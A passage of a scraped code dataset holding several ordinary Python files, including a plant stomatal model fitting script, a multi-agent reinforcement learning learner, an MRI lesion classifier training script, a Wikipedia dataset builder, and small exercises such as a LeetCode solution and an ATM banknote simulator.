[data_i['VPD_l'].values, data_i['CO2'].values, data_i['GPP'].values, \n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values, \n data_i['S'].values, data_i['canopy_water_pot_pd'].values, data_i['leaf_water_pot'].values,\n data_i['Ga_mol'].values, data_i['Rn-G'].values,\n data_i['TA_F_MDS'].values, data_i['VPD_a'].values, \n data_i['P_air'].values, data_i['rho_air_d'], data_i['LAI']]\n\n for tag in mod_list:\n if tag.startswith('WUE'):\n pp_m = ['lww', 'b']\n\n elif tag.startswith('CM'):\n pp_m = ['b2', 'b1', 'a', 'psi_50']\n \n elif tag.startswith('SOX'):\n pp_m = ['kmax', 'a', 'psi_50']\n\n g_params = Parameters()\n g_params.add('tag%s' % tag, value=0, vary=False)\n g_params.add('gsoil_max', value= data_i['gsoil_max_0_d'].values[0], vary=False)\n\n m_params = Parameters()\n m_params.add('tag%s' % tag, value=0, vary=False)\n m_params.add('gsoil_max', value= data_i['gsoil_max_0_d'].values[0], vary=False)\n\n for pi in ['lww', 'b', 'b2', 'b1', 'a', 'psi_50', 'kmax']:\n if pi in pp_m:\n if (pi in ['a', 'psi_50']) and (tag in ['SOXa_d1', 'SOX_d1', 'SOXait_d1', \n 'SOXit_d1', 'SOXa_i1', 'SOX_i1', \n 'CM_d2', 'CM_i2']):\n pi_g = data_i['%s_ref' % pi].values[0]\n pi_m = data_i['%s_ref' % pi].values[0]\n else:\n print(tag, pi, pft_i)\n pi_g = gen_params[(gen_params['model'] == tag) \n & (gen_params['parameter'] == pi)]['median'].values[0]\n pi_m = np.median(splitfit_results[tag][pi])\n m_params.add(pi, value=pi_m, vary=False)\n g_params.add(pi, value=pi_g, vary=False)\n else:\n g_params.add(pi, value=np.nan, vary=False)\n m_params.add(pi, value=np.nan, vary=False)\n\n g_surf_mod, g_soil_mod, g_canopy_mod, mwue =cal_g_surf(g_params, xx)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod)\n data_i['LE_%s_gen' % tag] = LE\n g_surf_mod_, g_soil_mod_, g_canopy_mod_, mwue_ = cal_g_surf(g_params, xx_l, leaf=1)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod_)\n data_i['LE_LAI_%s_gen' % tag] = LE\n ci = opt_ci(mwue_, data_i['VPD_l'].values, data_i['CO2'].values,\n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values)\n data_i['GPP_LAI_%s_gen' % tag] = 1 / 1.6 * g_canopy_mod_ * (data_i['CO2'].values - ci)\n\n g_surf_mod_, g_soil_mod_, g_canopy_mod_, mwue_ = cal_g_surf(m_params, xx_l, leaf=1)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod_)\n data_i['LE_LAI_%s' % tag] = LE\n ci = opt_ci(mwue_, data_i['VPD_l'].values, data_i['CO2'].values,\n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values)\n data_i['GPP_LAI_%s' % tag] = 1 / 1.6 * g_canopy_mod_ * (data_i['CO2'].values - ci)\n\n out_file_m = os.path.join(res_dir, '%s_%s' % (site_i, f_name_i))\n \n data_i.to_csv(out_file_m)\n print(site_i, 'done')\n\n\nif __name__ == \"__main__\":\n \n by_site_params('param_results_allsites_%s.csv' % sel)\n gen_loso_params('gen_params_table_%s.csv' % sel)\n overall_pft_params('pft_params_table_%s.csv' % sel)\n cal_gen_model('fitted_models_LE_gen.csv')\n","repo_name":"maoyab/DESOM","sub_path":"process_fit_gs_results.py","file_name":"process_fit_gs_results.py","file_ext":"py","file_size_in_byte":12225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6356872909","text":"import copy\nfrom components.episode_buffer import EpisodeBatch\nfrom modules.mixers.vdn import VDNMixer\nfrom modules.mixers.qmix import QMixer\nimport torch as th\nfrom torch.optim import RMSprop\n\nimport numpy as np\n\n\nclass RODELearner:\n def __init__(self, mac, scheme, logger, args):\n self.args = args\n self.mac = mac\n self.logger = logger\n self.n_agents = args.n_agents\n\n self.params = list(mac.parameters())\n\n self.last_target_update_episode = 0\n\n self.mixer = None\n if args.mixer is not None:\n if args.mixer == \"vdn\":\n self.mixer = VDNMixer()\n elif args.mixer == \"qmix\":\n self.mixer = QMixer(args)\n else:\n raise ValueError(\"Mixer {} not recognised.\".format(args.mixer))\n self.params += list(self.mixer.parameters())\n self.target_mixer = copy.deepcopy(self.mixer)\n\n self.role_mixer = None\n if args.role_mixer is not None:\n if args.role_mixer == \"vdn\":\n self.role_mixer = VDNMixer()\n elif args.role_mixer == \"qmix\":\n self.role_mixer = QMixer(args)\n else:\n raise ValueError(\"Role Mixer {} not recognised.\".format(args.role_mixer))\n self.params += list(self.role_mixer.parameters())\n self.target_role_mixer = copy.deepcopy(self.role_mixer)\n\n self.optimiser = RMSprop(params=self.params, lr=args.lr, alpha=args.optim_alpha, eps=args.optim_eps)\n\n # a little wasteful to deepcopy (e.g. duplicates action selector), but should work for any MAC\n self.target_mac = copy.deepcopy(mac)\n\n self.log_stats_t = -self.args.learner_log_interval - 1\n\n self.role_interval = args.role_interval\n self.device = self.args.device\n\n self.role_action_spaces_updated = True\n\n # action encoder\n self.action_encoder_params = list(self.mac.action_encoder_params())\n self.action_encoder_optimiser = RMSprop(params=self.action_encoder_params, lr=args.lr,\n alpha=args.optim_alpha, eps=args.optim_eps)\n\n def train(self, batch: EpisodeBatch, t_env: int, episode_num: int):\n # Get the relevant quantities\n rewards = batch[\"reward\"][:, :-1]\n actions = batch[\"actions\"][:, :-1]\n terminated = batch[\"terminated\"][:, :-1].float()\n mask = batch[\"filled\"][:, :-1].float()\n mask[:, 1:] = mask[:, 1:] * (1 - terminated[:, :-1])\n avail_actions = batch[\"avail_actions\"]\n # role_avail_actions = batch[\"role_avail_actions\"]\n roles_shape_o = batch[\"roles\"][:, :-1].shape\n role_at = int(np.ceil(roles_shape_o[1] / self.role_interval))\n role_t = role_at * self.role_interval\n\n roles_shape = list(roles_shape_o)\n roles_shape[1] = role_t\n roles = th.zeros(roles_shape).to(self.device)\n roles[:, :roles_shape_o[1]] = batch[\"roles\"][:, :-1]\n roles = roles.view(batch.batch_size, role_at, self.role_interval, self.n_agents, -1)[:, :, 0]\n\n # Calculate estimated Q-Values\n mac_out = []\n role_out = []\n self.mac.init_hidden(batch.batch_size)\n for t in range(batch.max_seq_length):\n agent_outs, role_outs = self.mac.forward(batch, t=t)\n mac_out.append(agent_outs)\n if t % self.role_interval == 0 and t < batch.max_seq_length - 1:\n role_out.append(role_outs)\n mac_out = th.stack(mac_out, dim=1) # Concat over time\n role_out = th.stack(role_out, dim=1) # Concat over time\n\n # Pick the Q-Values for the actions taken by each agent\n chosen_action_qvals = th.gather(mac_out[:, :-1], dim=3, index=actions).squeeze(3) # Remove the last dim\n chosen_role_qvals = th.gather(role_out, dim=3, index=roles.long()).squeeze(3)\n\n # Calculate the Q-Values necessary for the target\n target_mac_out = []\n target_role_out = []\n self.target_mac.init_hidden(batch.batch_size)\n for t in range(batch.max_seq_length):\n target_agent_outs, target_role_outs = self.target_mac.forward(batch, t=t)\n target_mac_out.append(target_agent_outs)\n if t % self.role_interval == 0 and t < batch.max_seq_length - 1:\n target_role_out.append(target_role_outs)\n\n target_role_out.append(th.zeros(batch.batch_size, self.n_agents, self.mac.n_roles).to(self.device))\n # We don't need the first timesteps Q-Value estimate for calculating targets\n target_mac_out = th.stack(target_mac_out[1:], dim=1) # Concat across time\n target_role_out = th.stack(target_role_out[1:], dim=1)\n\n # Mask out unavailable actions\n target_mac_out[avail_actions[:, 1:] == 0] = -9999999\n # target_mac_out[role_avail_actions[:, 1:] == 0] = -9999999\n\n # Max over target Q-Values\n if self.args.double_q:\n # Get actions that maximise live Q (for double q-learning)\n mac_out_detach = mac_out.clone().detach()\n mac_out_detach[avail_actions == 0] = -9999999\n # mac_out_detach[role_avail_actions == 0] = -9999999\n cur_max_actions = mac_out_detach[:, 1:].max(dim=3, keepdim=True)[1]\n target_max_qvals = th.gather(target_mac_out, 3, cur_max_actions).squeeze(3)\n\n role_out_detach = role_out.clone().detach()\n role_out_detach = th.cat([role_out_detach[:, 1:], role_out_detach[:, 0:1]], dim=1)\n cur_max_roles = role_out_detach.max(dim=3, keepdim=True)[1]\n target_role_max_qvals = th.gather(target_role_out, 3, cur_max_roles).squeeze(3)\n else:\n target_max_qvals = target_mac_out.max(dim=3)[0]\n target_role_max_qvals = target_role_out.max(dim=3)[0]\n\n # Mix\n if self.mixer is not None:\n chosen_action_qvals = self.mixer(chosen_action_qvals, batch[\"state\"][:, :-1])\n target_max_qvals = self.target_mixer(target_max_qvals, batch[\"state\"][:, 1:])\n if self.role_mixer is not None:\n state_shape_o = batch[\"state\"][:, :-1].shape\n state_shape = list(state_shape_o)\n state_shape[1] = role_t\n role_states = th.zeros(state_shape).to(self.device)\n role_states[:, :state_shape_o[1]] = batch[\"state\"][:, :-1].detach().clone()\n role_states = role_states.view(batch.batch_size, role_at,\n self.role_interval, -1)[:, :, 0]\n chosen_role_qvals = self.role_mixer(chosen_role_qvals, role_states)\n role_states = th.cat([role_states[:, 1:], role_states[:, 0:1]], dim=1)\n target_role_max_qvals = self.target_role_mixer(target_role_max_qvals, role_states)\n\n # Calculate 1-step Q-Learning targets\n targets = rewards + self.args.gamma * (1 - terminated) * target_max_qvals\n rewards_shape = list(rewards.shape)\n rewards_shape[1] = role_t\n role_rewards = th.zeros(rewards_shape).to(self.device)\n role_rewards[:, :rewards.shape[1]] = rewards.detach().clone()\n role_rewards = role_rewards.view(batch.batch_size, role_at,\n self.role_interval).sum(dim=-1, keepdim=True)\n # role_terminated\n terminated_shape_o = terminated.shape\n terminated_shape = list(terminated_shape_o)\n terminated_shape[1] = role_t\n role_terminated = th.zeros(terminated_shape).to(self.device)\n role_terminated[:, :terminated_shape_o[1]] = terminated.detach().clone()\n role_terminated = role_terminated.view(batch.batch_size, role_at, self.role_interval).sum(dim=-1, keepdim=True)\n # role_terminated\n role_targets = role_rewards + self.args.gamma * (1 - role_terminated) * target_role_max_qvals\n\n # Td-error\n td_error = (chosen_action_qvals - targets.detach())\n role_td_error = (chosen_role_qvals - role_targets.detach())\n\n mask = mask.expand_as(td_error)\n mask_shape = list(mask.shape)\n mask_shape[1] = role_t\n role_mask = th.zeros(mask_shape).to(self.device)\n role_mask[:, :mask.shape[1]] = mask.detach().clone()\n role_mask = role_mask.view(batch.batch_size, role_at, self.role_interval, -1)[:, :, 0]\n\n # 0-out the targets that came from padded data\n masked_td_error = td_error * mask\n masked_role_td_error = role_td_error * role_mask\n\n # Normal L2 loss, take mean over actual data\n loss = (masked_td_error ** 2).sum() / mask.sum()\n role_loss = (masked_role_td_error ** 2).sum() / role_mask.sum()\n loss += role_loss\n\n # Optimise\n self.optimiser.zero_grad()\n loss.backward()\n grad_norm = th.nn.utils.clip_grad_norm_(self.params, self.args.grad_norm_clip)\n self.optimiser.step()\n\n pred_obs_loss = None\n pred_r_loss = None\n pred_grad_norm = None\n if self.role_action_spaces_updated:\n # train action encoder\n no_pred = []\n r_pred = []\n for t in range(batch.max_seq_length):\n no_preds, r_preds = self.mac.action_repr_forward(batch, t=t)\n no_pred.append(no_preds)\n r_pred.append(r_preds)\n no_pred = th.stack(no_pred, dim=1)[:, :-1] # Concat over time\n r_pred = th.stack(r_pred, dim=1)[:, :-1]\n no = batch[\"obs\"][:, 1:].detach().clone()\n repeated_rewards = batch[\"reward\"][:, :-1].detach().clone().unsqueeze(2).repeat(1, 1, self.n_agents, 1)\n\n pred_obs_loss = th.sqrt(((no_pred - no) ** 2).sum(dim=-1)).mean()\n pred_r_loss = ((r_pred - repeated_rewards) ** 2).mean()\n\n pred_loss = pred_obs_loss + 10 * pred_r_loss\n self.action_encoder_optimiser.zero_grad()\n pred_loss.backward()\n pred_grad_norm = th.nn.utils.clip_grad_norm_(self.action_encoder_params, self.args.grad_norm_clip)\n self.action_encoder_optimiser.step()\n\n if t_env > self.args.role_action_spaces_update_start:\n self.mac.update_role_action_spaces()\n if 'noar' in self.args.mac:\n self.target_mac.role_selector.update_roles(self.mac.n_roles)\n self.role_action_spaces_updated = False\n self._update_targets()\n self.last_target_update_episode = episode_num\n\n if (episode_num - self.last_target_update_episode) / self.args.target_update_interval >= 1.0:\n self._update_targets()\n self.last_target_update_episode = episode_num\n\n if t_env - self.log_stats_t >= self.args.learner_log_interval:\n self.logger.log_stat(\"loss\", (loss - role_loss).item(), t_env)\n self.logger.log_stat(\"role_loss\", role_loss.item(), t_env)\n self.logger.log_stat(\"grad_norm\", grad_norm, t_env)\n if pred_obs_loss is not None:\n self.logger.log_stat(\"pred_obs_loss\", pred_obs_loss.item(), t_env)\n self.logger.log_stat(\"pred_r_loss\", pred_r_loss.item(), t_env)\n self.logger.log_stat(\"action_encoder_grad_norm\", pred_grad_norm, t_env)\n mask_elems = mask.sum().item()\n self.logger.log_stat(\"td_error_abs\", (masked_td_error.abs().sum().item() / mask_elems), t_env)\n self.logger.log_stat(\"q_taken_mean\",\n (chosen_action_qvals * mask).sum().item() / (mask_elems * self.args.n_agents), t_env)\n self.logger.log_stat(\"role_q_taken_mean\",\n (chosen_role_qvals * role_mask).sum().item() / (role_mask.sum().item() * self.args.n_agents), t_env)\n self.logger.log_stat(\"target_mean\", (targets * mask).sum().item() / (mask_elems * self.args.n_agents),\n t_env)\n self.log_stats_t = t_env\n\n def _update_targets(self):\n self.target_mac.load_state(self.mac)\n if self.mixer is not None:\n self.target_mixer.load_state_dict(self.mixer.state_dict())\n if self.role_mixer is not None:\n self.target_role_mixer.load_state_dict(self.role_mixer.state_dict())\n self.target_mac.role_action_spaces_updated = self.role_action_spaces_updated\n self.logger.console_logger.info(\"Updated target network\")\n\n def cuda(self):\n self.mac.cuda()\n self.target_mac.cuda()\n if self.mixer is not None:\n self.mixer.cuda()\n self.target_mixer.cuda()\n if self.role_mixer is not None:\n self.role_mixer.cuda()\n self.target_role_mixer.cuda()\n\n def save_models(self, path):\n self.mac.save_models(path)\n if self.mixer is not None:\n th.save(self.mixer.state_dict(), \"{}/mixer.th\".format(path))\n if self.role_mixer is not None:\n th.save(self.role_mixer.state_dict(), \"{}/role_mixer.th\".format(path))\n th.save(self.optimiser.state_dict(), \"{}/opt.th\".format(path))\n th.save(self.action_encoder_optimiser.state_dict(), \"{}/action_repr_opt.th\".format(path))\n\n def load_models(self, path):\n self.mac.load_models(path)\n # Not quite right but I don't want to save target networks\n self.target_mac.load_models(path)\n if self.mixer is not None:\n self.mixer.load_state_dict(th.load(\"{}/mixer.th\".format(path), map_location=lambda storage, loc: storage))\n if self.role_mixer is not None:\n self.role_mixer.load_state_dict(\n th.load(\"{}/role_mixer.th\".format(path), map_location=lambda storage, loc: storage))\n self.optimiser.load_state_dict(th.load(\"{}/opt.th\".format(path), map_location=lambda storage, loc: storage))\n self.action_encoder_optimiser.load_state_dict(th.load(\"{}/action_repr_opt.th\".format(path),\n map_location=lambda storage, loc: storage))\n","repo_name":"TonghanWang/RODE","sub_path":"src/learners/rode_learner.py","file_name":"rode_learner.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"81"} +{"seq_id":"41187773173","text":"from django.core.management import BaseCommand\n\nfrom ...models import Metric\nfrom ...utils import reset_generation_key\n\n\nclass Command(BaseCommand):\n def handle(self, **options):\n verbose = int(options.get(\"verbosity\", 0))\n for MC in Metric.__subclasses__():\n for metric in MC.objects.all():\n if verbose:\n self.stdout.write(\n \"Updating %s ... \" % metric.name.lower(), ending=\"\"\n )\n datum = metric.data.create(measurement=metric.fetch())\n if verbose:\n print(datum.measurement)\n reset_generation_key()\n","repo_name":"django/djangoproject.com","sub_path":"dashboard/management/commands/update_metrics.py","file_name":"update_metrics.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1791,"dataset":"github-code","pt":"81"} +{"seq_id":"37959200210","text":"## To train single modality model\n## Setting the different paths to distinguish the lesion MRI and the lesion MRI contained by larger cube. \nimport torch\nimport time\nimport os\nimport sys\n\nimport torch\nimport argparse\nfrom utils.dataset_1m import dataset\n#from utils.dataset_full import dataset_no_ml\nfrom utils.util import write_num_ls, calc_metrics\nfrom net.clf_1m import be_ma_net\n\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\n\nimport random\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport torch.nn as nn\nimport numpy as np\nimport ml_collections\nfrom termcolor import colored \n\nparser = argparse.ArgumentParser()\nparser.add_argument('-root', type=str, default='')\nparser.add_argument('-train_path', type=str, default='')\nparser.add_argument('-vali_path', type=str, default='')\nparser.add_argument('-mt', type=str, default='')\nparser.add_argument('-model_save', type=str, )\nparser.add_argument('-seq', type=int, default=1)\nparser.add_argument('-cube', type=str, default=False)\n\nargs = parser.parse_args()\n\n\ndef train_net_config():\n\n config = ml_collections.ConfigDict()\n \n # config.mri_type=args.mt\n # config.seq=args.seq\n \n config.mri_type=args.mt\n config.seq=args.seq\n config.root=args.root\n \n if args.cube=='yes':\n config.cube=True\n else:\n config.cube=False\n\n config.train_path=args.train_path\n config.vali_path=args.vali_path\n\n config_model_save=args.model_save\n\n\n if args.cube:\n config.log_prefix=config.mri_type+'_cube_exp'+str(config.seq)\n else:\n config.log_prefix=config.mri_type+'_no_cube_exp'+str(config.seq)\n\n config.model_save=config_model_save+config.log_prefix+'/'\n \n config.log_path=config.model_save\n config.bs=16\n config.lr=0.01\n config.gpu='0'\n config.seed=1234\n config.min_epoch=1\n config.max_epoch=200\n config.log_name='log_from_epoch_{}_to_{}.txt'.format(config.min_epoch,config.max_epoch)\n config.deterministic=True\n\n return config\n\nconfig=train_net_config()\n#config=train_no_cube_config()\nos.makedirs(config.model_save,exist_ok=True)\n\nos.environ['CUDA_VISIBLE_DEVICES'] = config.gpu\n\nres_log = config.log_prefix+'_res_log.txt' ## loss logs\nloss_log = config.log_prefix+'_loss_ilog.txt'\nloss_log_e =config.log_prefix+'_loss_elog.txt'\n\n\nres_fd= open(config.log_path+res_log, 'w')\nloss_fd_i = open(config.log_path+loss_log, 'w')\nloss_fd_e = open(config.log_path+loss_log_e, 'w')\n\n\n\nuse_model = False\nuse_ml = False\n\n\nif config.deterministic:\n cudnn.benchmark = False\n cudnn.deterministic = True\n random.seed(config.seed)\n np.random.seed(config.seed)\n torch.manual_seed(config.seed)\n torch.cuda.manual_seed(config.seed)\n\ndef worker_init_fn(worker_id):\n random.seed(config.seed + worker_id)\n\n\ndef accuary(outputs, label):\n _, predicted = torch.max(outputs.data, 1)\n \n sum = 0\n for i in range(predicted.shape[0]):\n if predicted[i] == label[i]:\n sum += 1\n return float(sum / len(predicted))\n\n\ndef acc_count(outputs, label):\n _, predicted = torch.max(outputs.data, 1)\n sum = 0\n for i in range(predicted.shape[0]):\n if predicted[i] == label[i]:\n sum += 1\n return sum\n\n\ndef vali(net, valiloader, length):\n net.eval()\n predict = []\n label = []\n pred_proba = []\n vali_acc_sum = 0\n\n for idx, (volume_batch,label_batch,) in enumerate(valiloader):\n volume_batch, label_batch = volume_batch.cuda(), label_batch.cuda()\n outputs = net(volume_batch)\n # print(outputs)\n acc = acc_count(outputs, label_batch)\n vali_acc_sum += acc\n\n _, predict_batch = torch.max(outputs.data, 1)\n softmax_out = F.softmax(outputs, dim=1).cpu()\n proba = np.squeeze(softmax_out.data.numpy())\n label_v = label_batch[0].item()\n pred_v = predict_batch[0].item()\n\n predict.append(pred_v)\n label.append(label_v)\n pred_proba.append(proba)\n\n vali_acc = vali_acc_sum / length\n #acc_auc_fd.writelines('iteration: {}, vali acc: {}.\\n'.format(iter_num, vali_acc))\n return vali_acc, label, predict, pred_proba\n\nif __name__ == '__main__':\n\n\n net = be_ma_net(1).cuda()\n \n print(res_log)\n print(loss_log)\n print(loss_log_e)\n\n\n print('train_root is {}, train_path is {}'.format(config.root,config.train_path))\n print('vali_root is {}, vali_path is {}'.format(config.root,config.vali_path))\n print('batch_size is: {}, init_lr is: {}'.format(config.bs,config.lr))\n print(\"save_path is: \",config.model_save)\n print(\"log save_path is: \",config.log_path)\n print(\"################# Loading Data ###########################\\n\")\n\n\n train_data = dataset(config.root, config.train_path)\n trainloader = DataLoader(train_data, batch_size=config.bs, shuffle=True, num_workers=4, pin_memory=True,\n worker_init_fn=worker_init_fn) \n train_len = len(train_data)\n\n vali_data = dataset(config.root, config.vali_path)\n valiloader = DataLoader(vali_data, batch_size=1, shuffle=True, num_workers=4, pin_memory=True,\n worker_init_fn=worker_init_fn)\n\n vali_len = len(vali_data)\n optimizer = optim.SGD(net.parameters(), lr=config.lr, momentum=0.9, weight_decay=0.0001)\n\n iter_num = 0\n \n lr_ = config.lr\n criterion = nn.CrossEntropyLoss()\n criterion.cuda()\n\n # net.train()\n print(\"the number of train samples.\", len(trainloader))\n print(\"#################### Train Start ####################\")\n\n date = time.strftime(\"%Y_%m_%d_%H_%M\")\n save_path = config.model_save\n\n \n if not os.path.exists(save_path):\n os.makedirs(save_path, exist_ok=True)\n\n\n\n for iter_num in range(1,config.max_epoch):\n net.train()\n loss_sum = 0\n time1 = time.time()\n\n for idx, (volume_batch,label_batch,) in enumerate(trainloader):\n # print('fetch data cost {}'.format(time2-time1))\n # print(\"label value....\",label_batch)\n\n # print(\"volume_batch....\", volume_batch.shape)\n volume_batch, label_batch = volume_batch.cuda(), label_batch.cuda()\n\n outputs = net(volume_batch)\n # outputs = net(volume_batch)\n\n # print(outputs.shape)\n loss = criterion(outputs, label_batch)\n loss_iter_v=loss.item()\n #print(loss_iter_v)\n loss_fd_i.write(str(loss_iter_v) + ' ')\n ## acc=accuary(outputs,label_batch)\n loss_sum += loss_iter_v\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n time2 = time.time()\n loss_v = loss_sum / len(trainloader)\n print('iteration:{}, loss value:{}, time:{}.'.format(iter_num, loss_v, time2 - time1))\n res_fd.writelines('iteration:{}, loss value:{}, time:{}.\\n'.format(iter_num, loss_v, time2 - time1))\n loss_fd_e.writelines('iteration:{}, loss value:{}.\\n'.format(iter_num, loss_v))\n \n \n\n if iter_num %10==0:\n train_acc, _, _, _ = vali(net, trainloader, train_len)\n vali_acc, label, predict, pred_proba = vali(net, valiloader, vali_len)\n\n print('train acc: {} and vali_acc: {}'.format(train_acc,vali_acc))\n res_fd.writelines('train acc: {} and vali_acc: {}\\n'.format(train_acc,vali_acc))\n pred_proba = np.array(pred_proba)[:, -1].tolist()\n \n auc_v,acc,sensitivity,specificity,npv,ppv,=calc_metrics(label, predict, pred_proba, False)\n print(colored('auc_v {},acc {},sensitivity {},specificity {},npv {},ppv {}'.format(auc_v,acc,sensitivity,specificity,npv,ppv),'green'))\n res_fd.writelines(\"auc_v {},acc {},sensitivity {},specificity {},npv {},ppv {}\\n\".format(auc_v,acc,sensitivity,specificity,npv,ppv))\n model_name='iter_' + str(iter_num + 1)+'_'+str(auc_v)+'_'+str(acc)+'.pth'\n mode_path = os.path.join(save_path, model_name)\n torch.save(net.state_dict(), mode_path)\n","repo_name":"BCClfer/Classification-of-benign-and-malignant-lesions","sub_path":"train_single_mod.py","file_name":"train_single_mod.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18712944141","text":"from collections import defaultdict\nimport re\nimport jadelogs\nimport wikitextparser\nimport csv\n\n\nfrom tropes.datahandlers.wikipedia.wikipedia_datahandler import WikipediaDatahandler\n\nclass WikipediaAnalysis:\n def __init__(self):\n self._wikipedia_data_handler = WikipediaDatahandler()\n self._subtitles_counts = defaultdict(int)\n self._jade_logger = jadelogs.JadeLogger()\n\n def load(self):\n self._wikipedia_data_handler.load()\n\n def get_list_of_subheadings(self):\n subheadings = []\n location = 'narrativelab/tropes/analysis/wikipedia/list_of_picked_subheadings.txt'\n location = self._jade_logger.file_manager.code_filepath(location)\n with open(location) as f:\n for line in f:\n subheadings.append(line.strip())\n return subheadings\n\n def create_dataset(self):\n dataset = defaultdict(list)\n subheadings = self.get_list_of_subheadings()\n for subheading in subheadings:\n dataset[subheading] = []\n interested = False\n para = \"\"\n\n for datum in self._wikipedia_data_handler.data():\n heading_flag = datum.startswith('==') and not datum.startswith('===')\n if heading_flag is True:\n word = re.sub(r'=*', '', datum)\n word = word.strip()\n if word in subheadings:\n interested = True\n else:\n interested = False\n if para != \"\":\n if interested is True and len(dataset[key]) < 200:\n dataset[key].extend(self._clean_sentence(para))\n para = \"\"\n key = word\n if interested is True and heading_flag is False:\n para += ' ' + datum\n print(sum([len(dataset[key]) for key in dataset.keys()]), len(dataset.keys()) * 200)\n if sum([len(dataset[key]) for key in dataset.keys()]) > len(dataset.keys()) * 200:\n for key in dataset:\n print(key)\n print('--' * 4),\n print(dataset[key])\n break\n self.dict2csv(dataset)\n\n def _clean_sentence(self, sentence):\n if sentence.strip() == '':\n return []\n sections = wikitextparser.parse(sentence).sections\n text = \"\"\n for section in sections:\n try:\n text += section.plain_text()\n except (IndexError, AttributeError):\n continue\n text = text.split('. ')\n text = [i + '. ' for i in text if len(i) > 0]\n return text\n \n def dict2csv(self, dict):\n location = 'narrativelab/tropes/analysis/wikipedia/output.csv'\n location = self._jade_logger.file_manager.code_filepath(location)\n writer = csv.writer(open(location, 'wt'))\n for key, value in dict.items():\n for line in value:\n line = re.sub(r'\\n', '', line)\n if 'ref' in line or line.strip() == '' or len(line) < 10:\n continue\n writer.writerow([key, line])\n\n\nif __name__ == '__main__':\n wa = WikipediaAnalysis()\n wa.load()\n wa.create_dataset()\n","repo_name":"vedmathai/narrativelab","sub_path":"tropes/analysis/wikipedia/dataset_creator.py","file_name":"dataset_creator.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69794395786","text":"# Problem Statement: https://leetcode.com/problems/next-greater-element-i/\n\nclass Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n greater_map = {x : -1 for x in nums1} \n stack = []\n\t\t\n for num in nums2:\n while stack and stack[-1] < num:\n prev_num = stack.pop()\n if prev_num in greater_map:\n greater_map[prev_num] = num\n stack.append(num)\n \n return [greater_map[x] for x in nums1]","repo_name":"yashitanamdeo/leetcode","sub_path":"Easy/496. Next Greater Element I.py","file_name":"496. Next Greater Element I.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"38887086028","text":"import configparser\n\n\n# 全局变量\nclass GloVar:\n config_file_path = 'config/config.ini'\n\n\n# 配置文件路径\nclass IconPath:\n open_picture_folder = 'config/icon/open_picture.png'\n open_picture = 'config/icon/open_picture.png'\n zoom_picture = 'config/icon/zoom.png'\n zoom_out_picture = 'config/icon/zoom_out.png'\n original_size_picture = 'config/icon/original_size.png'\n screen_shot = 'config/icon/screen_shot.png'\n suitable_size = 'config/icon/suitable_size.png'\n last_picture = 'config/icon/last.png'\n next_picture = 'config/icon/next.png'\n left_picture = 'config/icon/left.png'\n right_picture = 'config/icon/right.png'\n save_picture = 'config/icon/save.png'\n select_path = 'config/icon/select_path.png'\n\n\n# 配置文件的读取和写入\nclass Profile:\n # 获取配置文件value\n @staticmethod\n def get_config_value(file, section, option):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8')\n value = config.get(section, option)\n return value\n\n # 设置config的参数\n @staticmethod\n def set_config_value(file, section, option, value):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8')\n if section not in config.sections():\n config.add_section(section)\n config.set(section, option, str(value))\n with open(file, 'w+', encoding='utf-8') as cf:\n config.write(cf)\n\n # 获取节点options\n @staticmethod\n def get_config_options(file, section):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8-sig')\n options = config.options(section)\n return options\n\n\n# 合并路径(传入要合并的几个部分)\nclass MergePath:\n @staticmethod\n def merge_path(*args):\n path_list = []\n for section in args:\n if '\\\\\\\\' in section:\n section = section.replace('\\\\\\\\', '/')\n elif '\\\\' in section:\n section = section.replace('\\\\', '/')\n else:\n section = section\n path_list.append(section)\n merged_path = '/'.join(path_list)\n if '//' in merged_path:\n merged_path = merged_path.replace('//', '/')\n else:\n merged_path = merged_path\n return merged_path\n","repo_name":"mrshensong/picture_tool","sub_path":"global_var.py","file_name":"global_var.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36045068833","text":"# Desafio 71 - Simulador de caixa eletrônico\r\n\r\n\"\"\"\r\nCrie um programa que simule o funcionamento de um caixa eletrônico. No inicio, pergunte ao usuario\r\nqual sera o valor a ser sacado (numero inteiro) e o programa vai informar quantas cédulas de cada\r\nvalor serão entregues\r\n\r\nobs: Considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1\r\n\"\"\"\r\n\r\nfrom time import sleep\r\nprint('\\033[31m=' * 30)\r\nprint(f'{\"BANCO\":^30}')\r\nprint('=' * 30, '\\033[m')\r\nvalor = int(input('Qual valor você quer sacar? R$'))\r\nsleep(0.5)\r\nprint('\\033[34mSacando...\\033[m')\r\nsleep(1)\r\ntotal = valor\r\ncéd = 100\r\ntotcéd = 0\r\nwhile True:\r\n if total >= céd:\r\n total -= céd\r\n totcéd += 1\r\n else:\r\n if totcéd > 0:\r\n print(f'Total de {totcéd} de {\"cédula\" if totcéd == 1 else \"cédulas\"} de R${céd}')\r\n if céd == 100:\r\n céd = 50\r\n 